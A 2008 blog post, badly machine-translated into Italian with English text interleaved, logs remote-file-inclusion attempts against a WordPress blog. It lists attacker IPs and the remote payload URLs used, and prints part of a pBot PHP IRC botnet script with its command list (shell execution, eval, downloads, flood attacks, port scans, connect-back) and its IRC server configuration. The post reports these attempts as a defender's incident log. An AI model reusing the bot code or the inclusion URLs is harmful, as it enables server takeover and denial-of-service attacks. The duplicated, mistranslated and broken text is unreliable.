Kakkoi Kakkoi

"sviluppo web, software, finestre suggerimenti e trucco"

Hacking tenta ogni giorno a blog.kakkoi.net - Feb 6th, 2008

Feb Febbraio
06 06

Hacking tenta ogni giorno a blog.kakkoi.net - Feb 6th, 2008

Postato da Arca di Noè 6 mesi, 4 settimane fa.

Archiviato in Sicurezza ¸ script di iniezione e vulnerabilità.

tentativi di hacking Oggi abbiamo appena aggiornamento da WordPress 2.3.2 a 2.3.3 protezione. Non vi è di 21 attacco (script iniezioni) a partire da 3 blog.kakkoi.net noto bot-herder ↓ script. Il primo attaccante è da 212.24.62.200 → udkado.ru mascheratura loro UserAgent come Googlebot (una vera e propria umana?). Sono stati il giocare con la mia pagina di reindirizzamento 302.curie a blog.kakkoi.net / uri /. Inviare i dati utente malintenzionato di abusare di rete e di IronPort.

L'ordine del giorno poche ore abbiamo ricevuto 20 attacco dello stesso bot-herder. Che probabilmente ha una larga scala di DDNS (cina corea → → noi). Notevolmente le scansioni modello è prevedibile. Dal nostro feb 5a attacco tutte queste botnet è il targeting per alcune parole chiave di ricerca di sicurezza, l'iniezione in modo da impostare un miele-pentola a destra su quel particolare URL.

Hacking Attempts on Kakkoi I tentativi di hacking su Kakkoi

Sort by Injection type. Ordina per tipo di iniezione.

IP / DDNS PI / DDNS	UA UA	ATT ATT	Country Paese	Params
212.24.62.200 212.24.62.200	Googlebot Googlebot	1	Russia Russia	www.yahoo.com www.yahoo.com Request URI: www.yahoo.com URI della richiesta: www.yahoo.com
61.152.158.46 61.152.158.46	N/A N / A	4	China Porcellana	http://basiclifesaving.org/mycomments/rom.txt http://www.freewebtown.com/acc827/test.txt Request URI: /security/injection/ URI della richiesta: / security / iniezione /
85.88.3.47 85.88.3.47 74.205.123.49 74.205.123.49 210.205.6.161 210.205.6.161 207.44.246.45 207.44.246.45	N/A N / A	16	Germany Germania US Stati Uniti Korea Corea US Stati Uniti	http://basiclifesaving.org/mycomments/rom.txt http://www.freewebtown.com/acc827/test.txt Request URI: /security/injection/ URI della richiesta: / security / iniezione /

The Bot-herder Host Il Bot-herder Host

Parte della classe pBot fonte prelevati da http://basiclifesaving.org/mycomments/rom.txt

 <? /*  *  * #crew@corp. / * * * # Equipaggio @ corp. since 2003  * edited by: devil__ <admin@xdevil.org>  *  * COMMANDS:  *  * .user <password> //login to the bot  * .logout //logout of the bot  * .die //kill the bot  * .restart //restart the bot  * .mail <to> <from> <subject> <msg> //send an email  * .dns <IP|HOST> //dns lookup  * .download <URL> <filename> //download a file  * .exec <cmd> // uses exec() //execute a command  * .sexec <cmd> // uses shell_exec() //execute a command  * .cmd <cmd> // uses popen() //execute a command  * .info //get system information  * .php <php code> // uses eval() //execute php code  * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack  * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack  * .raw <cmd> //raw IRC command  * .rndnick //change nickname  * .pscan <host> <port> //port scan  * .safe // test safe_mode (dvl)  * .inbox <to> // test inbox (dvl)  * .conback <ip> <port> // conect back (dvl)  * .uname // return shell's uname using a php function (dvl)  *  */  set_time_limit(0); error_reporting(0); echo "Ok unlocker. We did i!";  class pBot {  var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",  "port"=>"6667",  "pass"=>"n",  "prefix"=>"[R]",  "maxrand"=>"4",  "chan"=>"#unlocker",  "chan2"=>"#unlocker",  "key"=>"n",  "modes"=>" p",  "password"=>"n",  "trigger"=>".",  "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)  ); dal 2003 * a cura di: devil__ <admin@xdevil.org> * * comandi: * *. <password> utente / / login per il bot *. logout / / logout dei bot *. muoiono / / uccidere il bot *. riavviare / / riavviare il bot *. <to> mail <from> <subject> <msg> / / inviare una e-mail *. dns <IP|HOST> / / * DNS. scaricare <url> <nomefile> / / download * un file. <cmd> exec / / impieghi exec () / / esecuzione di un comando *. sexec <cmd> / / impieghi shell_exec () / / esecuzione di un comando *. cmd <cmd> / / impieghi popen () / / eseguire un comando *. info / / ottenere informazioni sul sistema *. <php code> php / / usa eval () / / eseguire codice php *. tcpflood <target> <packets> <packetsize> <porta> <delay> / / tcpflood * attacco. udpflood <target> <packets> <packetsize> <delay> / / * udpflood attacco. greggio <cmd> / / raw IRC comando *. rndnick / / * modifica nickname. pscan <host> <porta> / / porto * scansione. cassaforte / / test safe_mode (dvl) *. casella di posta <to> / / test casella di posta in arrivo (dvl) *. conback <IP> <porta> / / conect indietro (dvl) *. uname / / ritorno della shell uname utilizzando un php function (dvl) * * / set_time_limit (0); error_reporting (0); echo "Ok Unlocker. Ci ho!"; classe pBot (var $ config = array ( "server" => "Bucharest.ro.eu. ultra-chat.org "," porto "=>" 6667 "," pass "=>" N "," prefisso "=>"[ R] "," maxrand "=>" 4 "," di "=> "# Unlocker", "chan2 "=>"# Unlocker", "chiave" => "N", "modi "=>"  p", "password" => "N", "trigger "=>". "," Hostauth "=>" Robert.users.ultra-chat.org "/ / * per ogni nome di host (ricordate: / setvhost xdevil.org));

External Links Collegamenti esterni

L'autore

Tag:

Rated 3 Valutato 3

February 6, 2008 at 10:59 pm 6 Febbraio 2008, 10:59 pm
February 7, 2008 at 6:44 pm Febbraio 7, 2008 6:44 pm
0.3 0,3
url URL

- Nessun Commento a "Daily Hacking tenta a blog.kakkoi.net - Feb 6th, 2008"
  Trackback URL: Trackback URL: Utilizzare il TrackBack url ↑ di eseguire il ping di questo articolo. Se il tuo blog non supporta Trackbacks si potrebbe desiderare di lasciare un commento.
- Comment Policy Politica commento
  RE: Tutti i giorni Hacking tenta a blog.kakkoi.net - Feb 6th, 2008 - 'La Guida' ↓
  Hacking tenta ogni giorno a blog.kakkoi.net - Feb 6th, 2008 Kakkoi 6 mesi, 4 settimane fa 5 URL
  Il seguente "Codice" hanno lo scopo di proteggere gli utenti di questo sito.
  Essere pertinenti: Il tuo commento dovrebbe essere un contributo attenti al tema della voce. Mantenere i vostri commenti costruttivo e gentile.
  N. pubblicità o spamming: non utilizzare la funzione di commento a promuovere enti commerciali / prodotti, servizi affiliati o siti web. Sei autorizzato a postare un link fintanto che è rilevante per l'entrata.
  Tenere entro la legge: non offensivo link a contenuti illegali o siti web. Non fare nessuna diffamatorio o denigratorie osservazioni che possano danneggiare la reputazione di una persona o organizzazione.
  Privacy: Non pubblicare tutte le informazioni personali relative a te stesso o chiunque altro - (vale a dire: indirizzo, luogo di lavoro, telefono o numero di cellulare o indirizzo e-mail).
  Al fine di mantenere queste esperienze piacevole e interessante per tutti i nostri utenti, ti chiediamo di seguire le guidlines sopra.
  be the first to comment. essere il primo a commentare.
  Sentiti libero di avviare, fare domande, e ci dicono quello che stai pensando! Regolari e dettagliati commenti sono la maggior parte ha accolto con favore.
"scrivere come se si tratta di un buon amico (di fronte a tua madre)."
.have your say . esprimere la tua opinione

Name (required) Nome (obbligatorio)
Email (required, will not be published) Email (obbligatorio, non verrà pubblicata)
Website Sito web
Disclaimer: Per qualsiasi contenuto che si posta, si dichiara a concedere Kakkoi il titolo gratuito, irrevocabile, perpetuo, esclusivo e pienamente licenza di utilizzare, riprodurre, modificare, adattare, pubblicare, tradurre, creare opere derivate, distribuire, eseguire e visualizzare tali contenuti in tutto o in parte, a livello mondiale e ad inserire in altre opere, in qualsiasi forma, media o tecnologia attualmente conosciuta o sviluppata successivamente. Alcuni diritti riservati.

Kakkoi Kakkoi

Hacking tenta ogni giorno a blog.kakkoi.net - Feb 6th, 2008